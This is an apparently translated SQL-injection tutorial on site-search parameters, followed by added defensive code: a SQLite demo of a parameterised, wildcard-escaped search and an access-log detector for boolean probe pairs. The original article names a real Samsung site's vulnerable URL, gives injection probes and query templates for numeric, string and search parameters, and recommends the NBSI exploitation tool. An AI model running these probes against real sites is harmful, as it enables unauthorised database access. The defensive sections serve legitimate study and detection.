Today's article covers search-type injection, a newer technique, using a flaw found on Samsung's notebook site as the example: http://notebook.samsung.com.cn/index.aspx
The injection pattern is:
A general site search, where the keyword is matched as a substring (a LIKE '%keyword%' query).
The vulnerable URL is http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
Construct the injection statements:
Samsung%' and 1=1 and '%'='
Samsung%' and 1=2 and '%'='
See that? The two pages returned are different, which is the signature of an injection vulnerability: the request with Samsung%' and 1=1 and '%'=' still returns results, while the 1=2 one does not.
We know that general search code is usually written like this:
Select * from table_name where field like '%keyword%'
This matches anything before and after the keyword (% is the wildcard that matches any string).
So if the keyword is not filtered, it can be constructed like this:
keyword=' and [query condition] and '%25'='
(%25 is the URL-encoded form of %.) The query then becomes:
Select * from table_name where field like '%' and [query condition] and '%'='%'
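The following is an added example, not code from the original article or from the site it discusses. It reproduces the search pattern above against a small in-memory SQLite table (the real site runs ASP.NET, which is not modelled here; SQLite stands in for whatever database is behind it) so you can see exactly why the two probe requests return different pages, and puts the hardened form next to it: a bound parameter plus escaping of the user's own % and _ wildcards. The table rows are constructed sample data.

```python
import sqlite3

# Constructed sample rows (not the site's data): a small news table like the one
# a notebook site's news search would query.
ROWS = [
    (1, "Samsung notebook launch", "product"),
    (2, "Samsung battery advisory", "product"),
    (3, "Store opening hours", "company"),
    (4, "100% recycled packaging", "company"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, type TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", ROWS)
    return conn

def search_vulnerable(conn, keyword):
    # The pattern the article describes: the keyword is concatenated straight into
    # the LIKE pattern, so a quote in it ends the string and the rest becomes SQL.
    sql = "SELECT id FROM news WHERE title LIKE '%" + keyword + "%'"
    return sorted(r[0] for r in conn.execute(sql))

def escape_like(value, esc="\\"):
    # Escape LIKE metacharacters so user-supplied % and _ match literally.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))

def search_safe(conn, keyword):
    # Bound parameter: the keyword travels as data, never as SQL text, and its own
    # wildcards are escaped. The %...% wrapping is added server-side, as intended.
    pattern = "%" + escape_like(keyword) + "%"
    sql = "SELECT id FROM news WHERE title LIKE ? ESCAPE '\\'"
    return sorted(r[0] for r in conn.execute(sql, (pattern,)))

if __name__ == "__main__":
    db = make_db()
    probe_true = "Samsung%' and 1=1 and '%'='"
    probe_false = "Samsung%' and 1=2 and '%'='"
    print("vulnerable, 1=1:", search_vulnerable(db, probe_true))   # [1, 2]: results page
    print("vulnerable, 1=2:", search_vulnerable(db, probe_false))  # []: empty page
    print("safe, same input:", search_safe(db, probe_true))        # []: literal no-match
    print("safe, bare %:", search_safe(db, "%"))                   # [4]: only the literal %
```

Two things are worth noticing. The vulnerable function returns different result sets for the 1=1 and 1=2 inputs purely because the appended condition is evaluated as SQL; the safe function treats both inputs as a literal title fragment and returns nothing for either. Parameterisation alone is not quite enough for LIKE: without the ESCAPE clause a bare % from the user still matches every row, which is why escape_like is applied before the wildcard wrapping.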
This makes a well-formed SQL injection point; you can of course work it by hand, and NBSI can be used as well.
Injection works the same here regardless of parameter type, so there is no need to worry about which type it is!
If you don't believe it, see the exact words from the "SQL Injection Bible" below:
Section 1: General steps of SQL injection
First, assess the environment, find the injection point, and determine the database type; this was already covered in the introductory article.
Second, reconstruct the original SQL statement in your head according to the type of the injected parameter. By parameter type there are three cases:
(A) Parameters such as id=49 are numeric, and the SQL statement is roughly:
Select * from table_name where field=49
The injected parameter is id=49 and [query condition], which builds the statement:
Select * from table_name where field=49 and [query condition]
(B) Parameters such as class=series are character type, and the original SQL statement is roughly:
Select * from table_name where field='series'
The injected parameter is class=series' and [query condition] and ''=', which builds the statement:
Select * from table_name where field='series' and [query condition] and ''=''
(C) When a search does not filter its parameter, such as keyword=keyword, the original SQL statement is roughly:
Select * from table_name where field like '%keyword%'
The injected parameter is keyword=' and [query condition] and '%25'=, which builds the statement:
Select * from table_name where field like '%' and [query condition] and '%'='%'
Of course, doing it by hand is troublesome.
As for tools, I suggest using NBSI; I feel that only NBSI works in combination with this technique, and other software cannot inject here.
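From the defender's side, the probe pairs described in this article (the 1=1 / 1=2 pair against the search parameter at the top, and the numeric, character and search cases quoted from the "SQL Injection Bible") all leave the same footprint in a web server's access log: one client sends the same URL twice, differing only in a boolean condition, and gets responses of different sizes. The following is an added example, not from the original article, that scans combined-format log lines for exactly that pattern. The log lines are constructed sample data using the article's URL path and parameter names; the IPs, timestamps and sizes are invented.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic). Lines 2 and 3 carry the
# tautology/contradiction pair from the article, URL-encoded as a browser sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /news/news.aspx?page=1&type=product&ST=title&SC=Samsung HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0800] "GET /news/news.aspx?page=1&type=product&ST=title&SC=Samsung%25%27+and+1%3D1+and+%27%25%27%3D%27 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:09 +0800] "GET /news/news.aspx?page=1&type=product&ST=title&SC=Samsung%25%27+and+1%3D2+and+%27%25%27%3D%27 HTTP/1.1" 200 1800
10.0.0.7 - - [01/Jan/2024:10:00:12 +0800] "GET /news/news.aspx?page=2&type=product&ST=title&SC=battery HTTP/1.1" 200 4900
"""

# Combined-log-format prefix: client IP, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+)'
)
# "and 1=1" / "or 2=3" style boolean tail, matched after URL-decoding. The \b rather
# than a leading quote lets it cover the numeric case (id=49 and 1=1) as well as the
# quoted character and search cases.
BOOL_RE = re.compile(r"\b(and|or)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)

def classify_param(value):
    """Return 'tautology', 'contradiction' or None for one decoded parameter value."""
    m = BOOL_RE.search(value)
    if not m:
        return None
    return "tautology" if m.group(2) == m.group(3) else "contradiction"

def find_probe_pairs(log_text):
    """Flag (client, path, parameter) triples that received both a true and a false
    boolean probe, and report the two response sizes: a size difference between the
    pair is what the article's 'two different pages' looks like in a log."""
    seen = defaultdict(dict)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for v in values:
                cls = classify_param(v)
                if cls:
                    seen[(m.group("ip"), url.path, name)][cls] = int(m.group("bytes"))
    alerts = []
    for (ip, path, param), classes in seen.items():
        if "tautology" in classes and "contradiction" in classes:
            alerts.append({
                "ip": ip, "path": path, "param": param,
                "size_true": classes["tautology"],
                "size_false": classes["contradiction"],
            })
    return alerts

if __name__ == "__main__":
    for alert in find_probe_pairs(SAMPLE_LOG):
        print(alert)
```

Decoding the query string before matching matters: in the raw log the probe reads Samsung%25%27+and+1%3D1, so a pattern written against the literal "and 1=1" would miss it. Keying alerts on the (client, path, parameter) triple rather than on single requests keeps ordinary searches that happen to contain the word "and" from firing; only a matched true/false pair against the same parameter is reported.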